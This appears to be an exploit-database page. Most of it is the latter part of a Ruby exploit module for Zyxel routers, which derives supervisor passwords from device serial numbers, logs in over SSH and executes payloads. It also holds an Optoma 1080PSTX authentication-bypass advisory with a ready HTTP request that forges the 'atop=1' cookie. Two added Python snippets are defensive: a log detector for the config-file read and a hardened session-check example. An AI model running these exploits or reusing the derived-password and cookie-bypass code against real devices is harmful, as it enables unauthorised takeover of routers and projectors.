    login_cfg = res_json.dig('X_ZYXEL_LoginCfg', 'LogGp')
    unless login_cfg.nil?
      @config['ssh_user'] = login_cfg.select { |l| 
l['Account']&.select { |a| a['Username'] == 'supervisor' } }.blank? ? nil : 'supervisor'<br /> end<br /><br /> remote_service = res_json.dig('X_ZYXEL_RemoteManagement', 'Service')<br /> unless remote_service.nil?<br /> service = remote_service.select { |s| s['Name'] == 'SSH' }.first<br /> if service&.fetch('Name', nil) == 'SSH'<br /> @config['ssh_port'] = service['Port']<br /> @config['ssh_wan_access'] = service['Mode']<br /> @config['ssh_service_enabled'] = service['Enable']<br /> end<br /> end<br /> print_status("Hardware:#{@config['hardware']} Firmware:#{@config['software']} Serial:#{@config['serial']}")<br /><br /> # check if all hash key/value pairs are populated and raise exceptions if retrieved config is not vulnerable<br /> if @config['serial'].nil? || @config['ssh_user'].nil? || @config['ssh_port'].nil? || @config['ssh_wan_access'].nil? || @config['ssh_service_enabled'].nil?<br /> raise ProcessConfigException.new 'Device serial, supervisor user, SSH port, or SSH WAN access/service status not found.', 'ConfigUnknown'<br /> end<br /><br /> # check if ssh service is enabled<br /> # if true then check ssh_port is open and ssh service is accessible from the WAN side<br /> if @config['ssh_service_enabled']<br /> if @config['ssh_wan_access'] == 'LAN_WAN' && check_port(@config['ssh_port'])<br /> return<br /> else<br /> raise ProcessConfigException.new "WAN access to SSH service is NOT allowed or SSH port #{@config['ssh_port']} is closed. Try exploit from the LAN side.", 'ConfigUnreachable'<br /> end<br /> else<br /> raise ProcessConfigException.new 'SSH service is NOT available.', 'ConfigNotVulnerable'<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }<br /> rescue Timeout::Error<br /> @timeout = true<br /> end<br /><br /> def do_login(ip, user, pass, ssh_port)<br /> # create SSH session and login<br /> # if login is successfull, return true else return false. 
All other errors will trigger an immediate fail<br /> opts = ssh_client_defaults.merge({<br /> auth_methods: ['password', 'keyboard-interactive'],<br /> port: ssh_port,<br /> password: pass<br /> })<br /><br /> opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']<br /><br /> begin<br /> ::Timeout.timeout(datastore['SSH_TIMEOUT']) do<br /> self.ssh_socket = Net::SSH.start(ip, user, opts)<br /> end<br /> rescue Rex::ConnectionError<br /> fail_with(Failure::Unreachable, 'Disconnected during negotiation')<br /> rescue Net::SSH::Disconnect, ::EOFError<br /> fail_with(Failure::Disconnected, 'Timed out during negotiation')<br /> rescue Net::SSH::AuthenticationFailed<br /> return false<br /> rescue Net::SSH::Exception => e<br /> fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")<br /> end<br /><br /> fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket<br /> return true<br /> end<br /><br /> def check_port(port)<br /> # checks network port and return true if open and false if closed.<br /> Timeout.timeout(datastore['ConnectTimeout']) do<br /> TCPSocket.new(datastore['RHOST'], port).close<br /> return true<br /> rescue StandardError<br /> return false<br /> end<br /> rescue Timeout::Error<br /> return false<br /> end<br /><br /> def check<br /> # Initiate the instance variable config to store the configuration<br /> # @config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }<br /><br /> res = get_configuration<br /> return CheckCode::Safe if res.nil? 
|| res.code != 200<br /><br /> begin<br /> process_configuration(res)<br /> rescue ProcessConfigException => e<br /> case e.exception_type<br /> when 'ConfigNotVulnerable', 'ConfigUnreachable'<br /> return CheckCode::Safe(e.message)<br /> when 'ConfigUnknown'<br /> return CheckCode::Unknown(e.message)<br /> end<br /> end<br /> return CheckCode::Vulnerable<br /> end<br /><br /> def exploit<br /> # run if AutoCheck is false (@config = nil), otherwise use the information in @config gathered during the check method<br /> unless @config<br /> res = get_configuration<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if res.nil? || res.code != 200<br /><br /> begin<br /> process_configuration(res)<br /> rescue ProcessConfigException => e<br /> case e.exception_type<br /> when 'ConfigNotVulnerable'<br /> return fail_with(Failure::NotVulnerable, e.message)<br /> when 'ConfigUnreachable'<br /> return fail_with(Failure::Unreachable, e.message)<br /> when 'ConfigUnknown'<br /> return fail_with(Failure::Unknown, e.message)<br /> end<br /> end<br /> end<br /><br /> # extra checks added to handle ForceExploit true setting<br /> if @config['ssh_service_enabled']<br /> if @config['ssh_wan_access'] == 'LAN_WAN' && check_port(@config['ssh_port'])<br /> print_status("SSH service is available and SSH Port #{@config['ssh_port']} is open. 
Continue to login.")<br /> else<br /> fail_with(Failure::Unreachable, 'SSH service is not availabe and/or SSH port is closed.')<br /> end<br /> else<br /> fail_with(Failure::BadConfig, 'SSH service and/or SSH port information is missing.')<br /> end<br /><br /> # derive supervisor password candidates using password derivation method SerialNumMethod2 and SerialNumMethod3<br /> if @config['serial'].nil?<br /> fail_with(Failure::BadConfig, 'Serial device number is missing to crack the supervisor password.')<br /> else<br /> supervisor_pwd = crack_supervisor_pwd(@config['serial'])<br /> end<br /><br /> # try supervisor password derived by SerialNumMethod3 first, if it fails then try the password derived by SerialNumMethod2<br /> if do_login(datastore['RHOST'], @config['ssh_user'], supervisor_pwd['method3'], @config['ssh_port'])<br /> print_status('Authentication with derived supervisor password using Method3 is successful.')<br /> report_creds(@config['ssh_user'], supervisor_pwd['method3']) if datastore['STORE_CRED']<br /> elsif do_login(datastore['RHOST'], @config['ssh_user'], supervisor_pwd['method2'], @config['ssh_port'])<br /> print_status('Authentication with derived supervisor password using Method2 is successful.')<br /> report_creds(@config['ssh_user'], supervisor_pwd['method2']) if datastore['STORE_CRED']<br /> else<br /> fail_with(Failure::NoAccess, 'Both supervisor password derivation methods failed to authenticate.')<br /> end<br /><br /> if target.name == 'Interactive SSH'<br /> handler(ssh_socket)<br /> return<br /> end<br /><br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager(linemax: 500)<br /> end<br /> @timeout ? ssh_socket.shutdown! 
: ssh_socket.close<br /> end<br />end<br /></code></pre>
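As an added defender-side example (not part of the module above), the following Python flags web-server log entries in which the Export_Log endpoint is handed a filesystem path such as /data/zcfg_config.json, the LFI step the module uses to pull the serial number out of the device configuration. The log lines are constructed, and the common-log-format layout is an assumption about the reader's logging setup.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not from any real device.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2023:10:01:02 +0000] "GET /login.html HTTP/1.1" 200 512
203.0.113.7 - - [12/May/2023:10:01:09 +0000] "GET /Export_Log?/data/zcfg_config.json HTTP/1.1" 200 48211
203.0.113.7 - - [12/May/2023:10:01:15 +0000] "GET /Export_Log?%2Fdata%2Fzcfg_config.json HTTP/1.1" 200 48211
10.0.0.5 - - [12/May/2023:10:02:00 +0000] "GET /Export_Log?log HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_export_log_lfi(target):
    """True when a request abuses Export_Log to read an arbitrary file.

    A legitimate export carries no path separators in its query string; the
    LFI variant hands the handler a filesystem path (optionally URL-encoded,
    so the query is decoded twice to also catch double encoding).
    """
    path, _, query = target.partition('?')
    if not path.lower().endswith('/export_log'):
        return False
    query = unquote(unquote(query))
    return '/' in query or '\\' in query or '..' in query


def find_config_reads(log_text):
    """Return (client_ip, decoded_target, status) for every matching request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_export_log_lfi(m['target']):
            hits.append((m['ip'], unquote(m['target']), m['status']))
    return hits


if __name__ == '__main__':
    for ip, target, status in find_config_reads(SAMPLE_LOG):
        print(f'config read attempt from {ip}: {target} (HTTP {status})')
```

A 200 status on such a request is the strongest signal, since a patched device should not return the configuration file at all.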
<pre><code># Exploit Title: Optoma 1080PSTX Firmware C02 - Auth Bypass<br />
# Date: 2023/05/09<br />
# Exploit Author: Anthony Cole<br />
# Contact: http://twitter.com/acole76<br />
# Website: http://twitter.com/acole76<br />
# Vendor Homepage: http://optoma.com<br />
# Version: Optoma 1080PSTX Firmware C02<br />
# Tested on: N/A<br />
# CVE: CVE-2023-27823<br />
<br />
Details<br />
By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker on the same network can bypass it by manually setting the "atop" cookie to the value "1".<br />
<br />
GET /index.asp HTTP/1.1<br />
Host: projector<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: en-US,en;q=0.9<br />
Cookie: atop=1<br />
Connection: close<br />
<br />
</code></pre>
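As an added example, not code from the advisory or from the vendor's firmware, this Python contrasts the flawed pattern behind the bypass above (treating a client-set atop=1 cookie as proof of login) with a server-issued opaque session token. The cookie parser, the SessionStore class and the user records are constructed for illustration.

```python
import hashlib
import hmac
import secrets


def parse_cookie_header(header):
    """Split a raw Cookie: header value such as 'atop=1; x=y' into a dict."""
    cookies = {}
    for part in header.split(';'):
        name, _, value = part.strip().partition('=')
        if name:
            cookies[name] = value
    return cookies


def vulnerable_is_authenticated(cookies):
    # Flawed pattern: the client controls every cookie value, so a request
    # that merely carries "atop=1" is accepted without any login having happened.
    return cookies.get('atop') == '1'


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100_000)


def make_user(password):
    """Constructed helper: build a (salt, pbkdf2_hash) record for one user."""
    salt = secrets.token_bytes(16)
    return salt, hash_password(password, salt)


class SessionStore:
    """Hardened pattern: the cookie carries only a random, server-issued token;
    the authenticated state itself lives on the server and cannot be forged."""

    def __init__(self, users):
        self._users = users        # {username: (salt, pbkdf2_hash)}
        self._sessions = {}        # {token: username}

    def login(self, username, password):
        record = self._users.get(username)
        if record is None:
            return None
        salt, stored = record
        if not hmac.compare_digest(hash_password(password, salt), stored):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[token] = username
        return token

    def is_authenticated(self, cookies):
        token = cookies.get('session', '')
        return any(hmac.compare_digest(token, t) for t in self._sessions)
```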